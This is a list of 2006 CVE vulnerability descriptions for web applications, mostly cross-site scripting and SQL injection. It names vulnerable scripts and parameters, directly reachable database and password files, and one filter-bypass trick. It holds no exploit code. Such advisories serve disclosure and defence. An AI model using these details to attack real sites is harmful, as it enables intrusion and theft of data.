[CVE-2006-6817] AlstraSoft Web Host Directory allows remote attackers to obtain sensitive information by requesting any invalid URI, which reveals the path in an error message, a different vulnerability than CVE-2006-2617.
[CVE-2006-6815] Multiple cross-site scripting (XSS) vulnerabilities in DMXReady Secure Login Manager 1.0 allow remote authenticated administrators to inject arbitrary web script or HTML via unspecified parameters to (1) set_preferences.asp, (2) send_password_preferences.asp, and (3) SecureLoginManager/list.asp in the Local-Admin Panel.
[CVE-2006-6808] Cross-site scripting (XSS) vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the get_file_description function in wp-admin/admin-functions.php.
[CVE-2006-6807] SQL injection vulnerability in list.asp in Softwebs Nepal (aka Ananda Raj Pandey) Ananda Real Estate 3.4 and earlier allows remote attackers to execute arbitrary SQL commands via the agent parameter.
[CVE-2006-6806] SQL injection vulnerability in newsdetail.asp in Enthrallweb eMates 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
[CVE-2006-6805] SQL injection vulnerability in newsdetail.asp in Enthrallweb eJobs allows remote attackers to execute arbitrary SQL commands via the ID parameter.
[CVE-2006-6803] SQL injection vulnerability in Types.asp in Enthrallweb eCars 1.0 allows remote attackers to execute arbitrary SQL commands via the Type_id parameter.
[CVE-2006-6802] SQL injection vulnerability in actualpic.asp in Enthrallweb ePages allows remote attackers to execute arbitrary SQL commands via the Biz_ID parameter.
[CVE-2006-6782] Cross-site scripting (XSS) vulnerability in pnamazu 2006.02.28 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6779] Cross-site scripting (XSS) vulnerability in Jelsoft vBulletin allows remote attackers to inject arbitrary web script or HTML via an SWF file that uses ActionScript to trigger execution of JavaScript.
[CVE-2006-6778] Cross-site scripting (XSS) vulnerability in shownews.php in TimberWolf 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the nid parameter.
[CVE-2006-6777] Cross-site scripting (XSS) vulnerability in index.cfm in Future Internet allows remote attackers to inject arbitrary web script or HTML via the categoryId parameter in a Portal.ShowPage action.
[CVE-2006-6769] Multiple cross-site scripting (XSS) vulnerabilities in PHP Live! 3.2.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) search_string parameter in (a) setup/transcripts.php, the (2) l parameter in (b) index.php, the (3) login field in (c) phplive/index.php, and the (4) deptid and (5) x parameters in (d) phplive/message_box.php.
[CVE-2006-6768] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in PWP Technologies The Classified Ad System allow remote attackers to inject arbitrary web script or HTML via the (1) cat or (2) main parameter.
[CVE-2006-6746] Multiple cross-site scripting (XSS) vulnerabilities in Xt-News 0.1 allow remote attackers to inject arbitrary web script or HTML via the id_news parameter to (1) add_comment.php or (2) show_news.php.
[CVE-2006-6735] modules/viewcategory.php in Minh Nguyen Duong Obie Website Mini Web Shop 2.1.c allows remote attackers to obtain sensitive information via a request with an arbitrary catname parameter but no itemsdb parameter, which reveals the path in an error message. NOTE: CVE analysis suggests that this error might be resultant from a more serious issue such as directory traversal.
[CVE-2006-6734] Cross-site scripting (XSS) vulnerability in modules/viewcategory.php in Minh Nguyen Duong Obie Website Mini Web Shop 2.1.c allows remote attackers to inject arbitrary web script or HTML via the catname parameter.
[CVE-2006-6733] Cross-site scripting (XSS) vulnerability in support/view.php in Support Cards 1 (osTicket) allows remote attackers to inject arbitrary web script or HTML via the e parameter.
[CVE-2006-6729] Cross-site scripting (XSS) vulnerability in a-blog 1.51 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6722] Bandwebsite (aka Bandsite portal system) 1.5 allows remote attackers to create administrative accounts via a direct request to admin.php with the Login parameter set to 1.
[CVE-2006-6721] Multiple cross-site scripting (XSS) vulnerabilities in shout.php in Knusperleicht ShoutBox 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) sbNick or (2) sbKommentar parameter.
[CVE-2006-6712] Cross-site scripting (XSS) vulnerability in SugarCRM Open Source 4.5.0f and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in crafted email messages.
[CVE-2006-6708] Cross-site scripting (XSS) vulnerability in listings.asp in MGinternet Property Site Manager allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2006-6706] SQL injection vulnerability in Soumu Workflow for Groupmax 01-00 through 01-01, Soumu Workflow 02-00 through 03-03, and Koukyoumuke Soumu Workflow 01-00 through 01-01 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors in certain web pages.
[CVE-2006-6705] Multiple unspecified vulnerabilities in the template files in Soumu Workflow for Groupmax 01-00 through 01-01, Soumu Workflow 02-00 through 03-03, and Koukyoumuke Soumu Workflow 01-00 through 01-01 allow remote attackers to bypass authentication mechanisms on web pages via unknown vectors.
[CVE-2006-6704] Cross-site scripting (XSS) vulnerability in the Webadmin in @Mail before 4.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "unescaped data in the database."
[CVE-2006-6703] Multiple cross-site scripting (XSS) vulnerabilities in Oracle Portal 9i and 10g allow remote attackers to inject arbitrary JavaScript via the tc parameter in webapp/jsp/container_tabs.jsp, and other unspecified vectors.
[CVE-2006-6702] Cross-site scripting (XSS) vulnerability in Global.pm in @Mail before 4.61 allows remote attackers to inject arbitrary web script or HTML via crafted e-mail messages. NOTE: The provenance of this information is unknown.
[CVE-2006-6701] Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51, and util.php in 5.x before 5.03, allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail.
[CVE-2006-6700] Cross-site scripting (XSS) vulnerability in @Mail WebMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: This information is based upon a vague initial disclosure. Details will be updated after the grace period has ended.
[CVE-2006-6697] CRLF injection vulnerability in webapp/jsp/calendar.jsp in Oracle Portal 10g and earlier, including 9.0.2, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the enc parameter.
[CVE-2006-6695] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Carsen Klock TextSend 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) error or (2) success parameter. NOTE: The provenance of this information is unknown.
[CVE-2006-6688] Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET) allows remote attackers to bypass filtering mechanisms via unknown vectors. NOTE: The provenance of this information is unknown.
[CVE-2006-6687] Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) 0.9.9.4, and 0.9.9.3.4 Network Edition (NE) (aka WebAPP.NET), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown.
[CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
[CVE-2006-6669] Cross-site scripting (XSS) vulnerability in export_handler.php in WebCalendar 1.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the format parameter.
[CVE-2006-6668] Cross-site scripting (XSS) vulnerability in VerliAdmin 0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown.
[CVE-2006-6649] Cross-site scripting (XSS) vulnerability in display.php in HyperVM 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an encoded frm_action parameter. NOTE: the vendor disputes this issue, but it is not certain whether the dispute is about the severity of the issue, or its existence.
[CVE-2006-6647] Cross-site scripting (XSS) vulnerability in the MySite 4.7.x before 4.7.x-3.3 and 5.x before 5.x-1.3 module for Drupal allows remote attackers to inject arbitrary web script or HTML via the Title field when editing a page. NOTE: some details were obtained from third party information.
[CVE-2006-6646] Multiple cross-site scripting (XSS) vulnerabilities in Drupal (1) Project Issue Tracking 4.7.x-1.0 and 4.7.x-2.0, and (2) Project 4.6.x-1.0, 4.7.x-1.0, and 4.7.x-2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, which do not use the check_plain function.
[CVE-2006-6645] PHP remote file inclusion vulnerability in language/lang_english/lang_admin.php in the Web Links (mx_links) 2.05 and earlier module for mxBB allows remote attackers to execute arbitrary PHP code via a URL in the mx_root_path parameter.
[CVE-2006-6640] Multiple cross-site scripting (XSS) vulnerabilities in Omniture SiteCatalyst allow remote attackers to inject arbitrary web script or HTML via the (1) ss parameter in (a) search.asp and the (2) company and (3) username fields on (b) the web login page. NOTE: some details were obtained from third party information.
[CVE-2006-6637] The Servlet Engine and Web Container in IBM WebSphere Application Server (WAS) before 6.0.2.17, when ibm-web-ext.xmi sets fileServingEnabled to true and servlet caching is enabled, allows remote attackers to obtain JSP source code and other sensitive information via "specific requests."
[CVE-2006-6636] Unspecified vulnerability in the Utility Classes for IBM WebSphere Application Server (WAS) before 5.1.1.13 and 6.x before 6.0.2.17 has unknown impact and attack vectors.
[CVE-2006-6629] lib/WeBWorK/PG/Translator.pm in WeBWorK Program Generation (PG) Language before 2.3.1 uses an insufficiently restrictive regular expression to determine valid macro filenames, which allows attackers to load arbitrary macro files whose names contain the strings (1) dangerousMacros.pl, (2) PG.pl, or (3) IO.pl.
[CVE-2006-6626] Cross-site scripting (XSS) vulnerability in an unspecified component of Moodle 1.5 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element. NOTE: The provenance of this information is unknown
[CVE-2006-6625] Cross-site scripting (XSS) vulnerability in mod/forum/discuss.php in Moodle 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the navtail parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6616] index.php in w00t Gallery 1.4.0 allows remote authenticated users with privileges for one installation to gain access to other installations on the same web server, aka "multi-gallery admin session spanning." NOTE: some of these details are obtained from third party information.
[CVE-2006-6611] PHP remote file inclusion vulnerability in interface.php in Barman 0.0.1r3 allows remote attackers to execute arbitrary PHP code via a URL in the basepath parameter.
[CVE-2006-6607] The Java Key Store (JKS) for WebSphere Application Server (WAS) for IBM Tivoli Identity Manager (ITIM) 4.6 places the JKS password in a -Djavax.net.ssl.trustStorePassword command line argument, which allows local users to obtain the password by listing the process or using other methods.
[CVE-2006-6600] Cross-site scripting (XSS) vulnerability in dir.php in TorrentFlux 2.2 allows remote attackers to inject arbitrary web script or HTML via double URL-encoded strings in the dir parameter, a related issue to CVE-2006-5609.
[CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
[CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
[CVE-2006-6582] Multiple cross-site scripting (XSS) vulnerabilities in ScriptMate User Manager 2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) members_username (user) and (2) members_password (password) fields in a login action in members/default.asp, and (3) the Search box. NOTE: some of these details are obtained from third party information.
[CVE-2006-6578] Microsoft Internet Information Services (IIS) 5.1 permits the IUSR_Machine account to execute non-EXE files such as .COM files, which allows attackers to execute arbitrary commands via arguments to any .COM file that executes those arguments, as demonstrated using win.com when it is in a web directory with certain permissions.
[CVE-2006-6571] Multiple cross-site scripting (XSS) vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cuve, (2) chem, (3) do, and possibly other parameters.
[CVE-2006-6548] Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the domain parameter to (1) scripts2/changeemail, (2) scripts2/limitbw, or (3) scripts/rearrangeacct. NOTE: the feature parameter to scripts2/dofeaturemanager is already covered by CVE-2006-6198.
[CVE-2006-6544] Cross-site scripting (XSS) vulnerability in CM68 News allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown
[CVE-2006-6537] IBM WebSphere Host On-Demand 6.0, 7.0, 8.0, 9.0, and possibly 10, allows remote attackers to bypass authentication via a modified pnl parameter, related to hod/HODAdmin.html and hod/frameset.html.
[CVE-2006-6536] Cross-site scripting (XSS) vulnerability in hata.asp in Cilem Haber Free Edition allows remote attackers to inject arbitrary web script or HTML via the hata parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6534] Multiple cross-site scripting (XSS) vulnerabilities in osCommerce 3.0a3 allow remote attackers to inject arbitrary web script or HTML via the (1) set parameter to admin/modules.php, the (2) selected_box parameter to definitiva/admin/customers.php, the (3) lID parameter to admin/languages_definitions.php, or the (4) pID parameter to admin/products.php.
[CVE-2006-6532] Multiple cross-site scripting (XSS) vulnerabilities in Vt-Forum Lite 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) StrMsg or (2) Topic_ID parameter to (a) vf_info.asp, (b) vf_newtopic.asp, (c) vf_settings.asp, and (d) vf_replytopic.asp, different vectors than CVE-2006-6447. NOTE: The provenance of this information is unknown
[CVE-2006-6531] Cross-site scripting (XSS) vulnerability in the Help Tip module before 4.7.x-1.0 for Drupal allows remote attackers to inject arbitrary web script or HTML, and possibly obtain administrative access, via node titles.
[CVE-2006-6523] Cross-site scripting (XSS) vulnerability in mail/manage.html in BoxTrapper in cPanel 11 allows remote attackers to inject arbitrary web script or HTML via the account parameter.
[CVE-2006-6522] Multiple cross-site scripting (XSS) vulnerabilities in WikiTimeScale TwoZero before 2.31 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the (1) forum module and (2) event descriptions. NOTE: some of these details are obtained from third party information.
[CVE-2006-6520] Multiple cross-site scripting (XSS) vulnerabilities in Messageriescripthp 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) pseudo parameter to (a) existepseudo.php, the (2) email parameter to (b) existeemail.php, or the (3) pageName or (4) cssform parameter to (c) Contact/contact.php.
[CVE-2006-6518] Multiple cross-site scripting (XSS) vulnerabilities in ProNews 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) pseudo, (2) email, (3) date, (4) sujet, (5) message, (6) site, and (7) lien parameters to (a) admin/change.php, and the (8) aa parameter to (b) lire-avis.php.
[CVE-2006-6517] Multiple cross-site scripting (XSS) vulnerabilities in KDPics 1.16 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) categories parameter to (a) index.php3 or (b) galeries.inc.php3.
[CVE-2006-6509] Cross-site scripting (XSS) vulnerability in the skinning feature in SiteKiosk before 6.5.150 allows local users to bypass security protections and inject arbitrary web script or HTML via an ABOUT: URI, which is displayed in the title bar of the browser.
[CVE-2006-6487] Cross-site scripting (XSS) vulnerability in index.php in DT Guestbook (dt_guestbook) 1.0f, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the error[] parameter.
[CVE-2006-6485] Multiple cross-site scripting (XSS) vulnerabilities in ShopSite 8.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the prevlocation parameter in shopper/sc/registration.cgi and other unspecified vectors.
[CVE-2006-6483] Adobe ColdFusion MX 7.x before 7.0.2 does not properly filter HTML tags when protecting against cross-site scripting (XSS) attacks, which allows remote attackers to inject arbitrary web script or HTML via a NULL byte (%00) in certain HTML tags, as demonstrated using "%00script" in a tag.
[CVE-2006-6479] Multiple cross-site scripting (XSS) vulnerabilities in AnnonceScriptHP 2.0 allow remote attackers to inject arbitrary web script or HTML via the email parameter in (1) erreurinscription.php, (2) Templates/admin.dwt.php, (3) Templates/commun.dwt.php, (4) membre.dwt.php, and (5) admin/admin_config/Aide.php.
[CVE-2006-6476] FRAgent.exe in Mandiant First Response (MFR) before 1.1.1, when run in daemon mode and when the agent is bound to 0.0.0.0 (all interfaces), opens sockets in non-exclusive mode, which allows local users to hijack the socket, and capture data or cause a denial of service (loss of daemon operation).
[CVE-2006-6473] Multiple unspecified vulnerabilities in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 have unknown impact and attack vectors, related to (1) an Immediate Image Overwrite (IIO) error message at the Local User Interface (LUI) if overwrite fails, (2) an IIO failure when a Held Job is deleted, and (3) an On Demand Image Overwrite failure when the overwrite is greater than 2 Gb.
[CVE-2006-6466] Multiple cross-site scripting (XSS) vulnerabilities in WBmap.php in WikyBlog 1.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) key, (2) d, (3) l, or (4) v parameter. NOTE: the provenance of this information is unknown
[CVE-2006-6463] Unrestricted file upload vulnerability in admin/add.php in Midicart allows remote authenticated users to upload arbitrary .php files, and possibly other files, to the images/ directory under the web root.
[CVE-2006-6459] Cross-site scripting (XSS) vulnerability in toplist.php in PhpBB Toplist 1.3.7 allows remote attackers to inject arbitrary HTML or web script via the (1) Name and (2) Information fields when adding a new site (toplistnew action).
[CVE-2006-6452] Multiple cross-site scripting (XSS) vulnerabilities in the MyArticles module before 0.6 beta 1, for RunCMS, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) topics.php, (2) submit.php, and (3) class/calendar.class.php.
[CVE-2006-6451] Multiple cross-site scripting (XSS) vulnerabilities in SWsoft Plesk 8.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) get_password.php or (2) login_up.php3.
[CVE-2006-6449] Vt-Forum Lite 1.3 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/forum.mdb. NOTE: The provenance of this information is unknown
[CVE-2006-6447] Multiple cross-site scripting (XSS) vulnerabilities in Vt-Forum Lite 1.3 and 1.5 allow remote attackers to inject arbitrary web script or HTML via (1) the StrMes parameter in vf_info.asp and possibly (2) a URL in the SRC attribute of an IFRAME element that is submitted to vf_newtopic.asp.
[CVE-2006-6436] Cross-site scripting (XSS) vulnerability in the Network controller in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 allows remote attackers to inject arbitrary web script or HTML via HTTP TRACE messages.
[CVE-2006-6430] Web services in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 do not require HTTPS, which allows remote attackers to obtain sensitive information by sniffing the unencrypted HTTP traffic.
[CVE-2006-6421] Cross-site scripting (XSS) vulnerability in the private message box implementation (privmsg.php) in phpBB 2.0.x allows remote authenticated users to inject arbitrary web script or HTML via the "Message body" field in a message to a non-existent user.
[CVE-2006-6420] Multiple cross-site scripting (XSS) vulnerabilities in jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.1.0 beta 2 and earlier for Joomla! (com_jce) allow remote attackers to inject arbitrary web script or HTML via the (1) img, (2) title, (3) w, or (4) h parameter, different vectors than CVE-2006-6166. NOTE: The provenance of this information is unknown
[CVE-2006-6413] Cross-site scripting (XSS) vulnerability in Amateras sns 3.11 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6401] Multiple cross-site scripting (XSS) vulnerabilities in mystats.php in MyStats 1.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) connexion, (2) by, and (3) details parameter.
[CVE-2006-6393] Cross-site scripting (XSS) vulnerability in Jonas Gauffin Publicera 1.0-rc2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the InputFilter::getString function.
[CVE-2006-6392] Directory traversal vulnerability in index.php in plx Web Studio (aka plxWebDev) plx Pay 3.2 and earlier allows remote attackers to include and execute arbitrary local files, or obtain user credentials and other sensitive information, via a .. (dot dot) in the read parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6389] Multiple cross-site scripting (XSS) vulnerabilities in ac4p Mobile allow remote attackers to inject arbitrary web script or HTML via the (1) Taaa parameter to (a) up.php, or the (2) pollhtml and (3) Bloks parameters to (b) polls.php, different vectors than CVE-2006-5770.
[CVE-2006-6388] Cross-site scripting (XSS) vulnerability in naprednaPretraga.php in LINK Content Management Server (CMS) allows remote attackers to inject arbitrary web script or HTML via the txtPretraga parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6386] Cross-site scripting (XSS) vulnerability in the CVS management/tracker 4.7.x-1.0, 4.7.x-2.0, and 4.7.0 (before the 20060807 contribution release system) for Drupal allows remote attackers to inject arbitrary web script or HTML via the motivation field in the CVS application page, which is not passed through check_markup on display.
[CVE-2006-6380] Cross-site scripting (XSS) vulnerability in index.asp in Ultimate HelpDesk allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2006-6378] BTSaveMySql 1.2 stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain configuration and save files via direct requests.
[CVE-2006-6377] Uploadscript 1.2 and earlier stores sensitive data under the web root with insufficient access control, which allows remote attackers to obtain the admin password hash via a direct request for /password.txt.
[CVE-2006-6375] Cross-site scripting (XSS) vulnerability in display.php in Simple Machines Forum (SMF) 1.1 Final and earlier allows remote attackers to inject arbitrary web script or HTML via the contents of a file that is uploaded with the image parameter set, which can be interpreted as script by Internet Explorer's automatic type detection.
[CVE-2006-6372] Multiple cross-site scripting (XSS) vulnerabilities in pbguestbook.php in JAB Guest Book 20061205 allow remote attackers to inject arbitrary web script or HTML via the (1) topic or (2) message parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6371] Cross-site scripting (XSS) vulnerability in pbguestbook.php in JAB Guest Book allows remote attackers to inject arbitrary web script or HTML via the author parameter.
[CVE-2006-6366] Cross-site scripting (XSS) vulnerability in includes/elements/spellcheck/spellwin.php in Cerberus Helpdesk 0.97.3, 2.0 through 2.7, 3.2.1, and 3.3 allows remote attackers to inject arbitrary web script or HTML via the js parameter. NOTE: The provenance of this information is unknown
[CVE-2006-6364] Cross-site scripting (XSS) vulnerability in error.php in Inside Systems Mail (ISMail) 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2006-6363] Cross-site scripting (XSS) vulnerability in admin.pl in BlueSocket Secure Controller (BSC) before 5.2, or without 5.1.1-BluePatch, allows remote attackers to inject arbitrary web script or HTML via the ad_name parameter.
[CVE-2006-6359] Cross-site scripting (XSS) vulnerability in Stefan Frech online-bookmarks 0.6.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6357] Cross-site scripting (XSS) vulnerability in templates/cat_temp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown
[CVE-2006-6356] Multiple cross-site scripting (XSS) vulnerabilities in templates/link_temp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) url, (2) id, (3) subject, (4) username, or (5) time parameter.
[CVE-2006-6351] KhaledMuratList stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) CL2F9R1A2C1N.mdb or (2) Data2F9R1A2C1N.mdb.
[CVE-2006-6350] listpics 5 stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for listpics.mdb.
[CVE-2006-6348] Cross-site scripting (XSS) vulnerability in board.php in mowdBB RC-6 allows remote attackers to inject arbitrary web script or HTML via the forum_name[] parameter.
[CVE-2006-6334] Heap-based buffer overflow in the SendChannelData function in wfica.ocx in Citrix Presentation Server Client before 9.230 for Windows allows remote malicious web sites to execute arbitrary code via a DataSize parameter that is less than the length of the Data buffer.
[CVE-2006-6308] ** DISPUTED ** Symantec LiveState 7.1 Agent for Windows allows local users to gain privileges by stopping the shstart.exe process and opening "Web Self-Service" from the system tray icon, which will open a browser window running with elevated privileges. NOTE: several third-party researchers have noted that administrator privileges may be necessary to terminate shstart.exe. If this is the case, then no privilege escalation occurs, and this is not a vulnerability.
[CVE-2006-6300] Cross-site scripting (XSS) vulnerability in CuteNews 1.3.6 allows remote attackers to inject arbitrary web script or HTML via the result parameter.
[CVE-2006-6283] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the subject field of (1) a private message (PM) or (2) a bulletin board post.
[CVE-2006-6278] Cross-site scripting (XSS) vulnerability in index.php in @lex Guestbook 4.0.1 allows remote attackers to inject arbitrary web script or HTML via the skin parameter.
[CVE-2006-6276] HTTP request smuggling vulnerability in Sun Java System Proxy Server before 20061130, when used with Sun Java System Application Server or Sun Java System Web Server, allows remote attackers to bypass HTTP request filtering, hijack web sessions, perform cross-site scripting (XSS), and poison web caches via unspecified attack vectors.
[CVE-2006-6272] Cross-site scripting (XSS) vulnerability in sp_index.php in Simple PHP Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the dir parameter.
[CVE-2006-6271] Multiple cross-site scripting (XSS) vulnerabilities in PHPOLL 0.96 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) index.php, (2) info.php
[CVE-2006-6259] Multiple directory traversal vulnerabilities in (a) class/functions.php and (b) class/m_bro.php in AlternC 0.9.5 and earlier allow remote attackers to (1) create arbitrary files and directories via a .. (dot dot) in the "create name" field and (2) read arbitrary files via a .. (dot dot) in the "web root" field when configuring a subdomain.
[CVE-2006-6256] Cross-site scripting (XSS) vulnerability in the file manager in admin/bro_main.php in AlternC 0.9.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a folder name.
[CVE-2006-6254] administration/telecharger.php in Cahier de texte 2.0 allows remote attackers to obtain unparsed content (source code) of files via the chemin parameter, as demonstrated using directory traversal sequences to obtain the MySQL username and password from conn_cahier_de_texte.php. NOTE: it is not clear whether the scope of this issue extends above the web document root, and whether directory traversal is the primary vulnerability.
[CVE-2006-6253] Cahier de texte 2.0 stores sensitive information under the web root, possibly with insufficient access control, which might allow remote attackers to obtain all users' passwords via a direct request for administration/dump.sql.
[CVE-2006-6249] Cross-site scripting (XSS) vulnerability in Chama Cargo 4.36 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6239] webadmin in MailEnable NetWebAdmin Professional 2.32 and Enterprise 2.32 allows remote attackers to authenticate using an empty password.
[CVE-2006-6228] Cross-site scripting (XSS) vulnerability in Codewalkers ltwCalendar (aka PHP Event Calendar) before 4.2.1 allows remote attackers to inject arbitrary HTML or web script via unknown vectors.
[CVE-2006-6223] Cross-site scripting (XSS) vulnerability in Google Search Appliance and Google Mini allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded q parameter.
[CVE-2006-6220] Multiple SQL injection vulnerabilities in Recipes Website (Recipes Complete Website) 1.1.14 allow remote attackers to execute arbitrary SQL commands via the (1) recipeid parameter to recipe.php or the (2) categoryid parameter to list.php.
[CVE-2006-6219] Multiple cross-site scripting (XSS) vulnerabilities in index.php in dev4u CMS allow remote attackers to inject arbitrary web script or HTML via the (1) user_name, (2) passwort, and (3) go_target parameters.
[CVE-2006-6215] Multiple SQL injection vulnerabilities in Wallpaper Website (Wallpaper Complete Website) 1.0.09 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) login or (2) password parameter to (a) process.php, or the (3) wallpaperid parameter to (b) dlwallpaper.php.
[CVE-2006-6214] SQL injection vulnerability in wallpaper.php in Wallpaper Website (Wallpaper Complete Website) 1.0.09 allows remote attackers to execute arbitrary SQL commands via the wallpaperid parameter.
[CVE-2006-6211] Multiple cross-site scripting (XSS) vulnerabilities in BirdBlog 1.4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter to (a) admin/admincore.php, the (2) month parameter to (b) admin/comments.php or (c) admin/entries.php, or the (3) page parameter to (d) admin/logs.php, different vectors than CVE-2006-5064.
[CVE-2006-6208] Multiple SQL injection vulnerabilities in Enthrallweb eClassifieds allow remote attackers to execute arbitrary SQL commands via the (1) AD_ID, (2) cat_id, (3) sub_id, and (4) ad_id parameters to (a) ad.asp, the (5) cid parameter to (b) dircat.asp, and the (6) sid parameter to (c) dirSub.asp.
[CVE-2006-6205] Multiple cross-site scripting (XSS) vulnerabilities in result.asp in Enthrallweb eHomes allow remote attackers to inject arbitrary web script or HTML via the (1) city or (2) State parameter.
[CVE-2006-6204] Multiple SQL injection vulnerabilities in Enthrallweb eHomes allow remote attackers to execute arbitrary SQL commands via the (1) cid parameter to (a) dircat.asp
[CVE-2006-6198] Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the (1) email parameter to (a) scripts2/dochangeemail, the (2) supporturl parameter to (b) cgi/addon_configsupport.cgi, the (3) pkg parameter to (c) scripts/editpkg, the (4) domain parameter to (d) scripts2/domts2 and (e) scripts/editzone, the (5) feature parameter to (g) scripts2/dofeaturemanager, and the (6) ndomain parameter to (h) scripts/park.
[CVE-2006-6197] Multiple cross-site scripting (XSS) vulnerabilities in b2evolution 1.8.2 through 1.9 beta allow remote attackers to inject arbitrary web script or HTML via the (1) app_name parameter in (a) _404_not_found.page.php, (b) _410_stats_gone.page.php, and (c) _referer_spam.page.php in inc/VIEW/errors/
[CVE-2006-6196] Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter).
[CVE-2006-6188] Cross-site scripting (XSS) vulnerability in view_search.asp in ClickTech Click Gallery allows remote attackers to inject arbitrary web script or HTML via the txtKeyWord parameter. NOTE: some of these details are obtained from third party information.
[CVE-2006-6180] Cross-site scripting (XSS) vulnerability in articles.asp in Expinion.net iNews Publisher (iNP) 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the hl parameter. NOTE: The provenance of this information is unknown
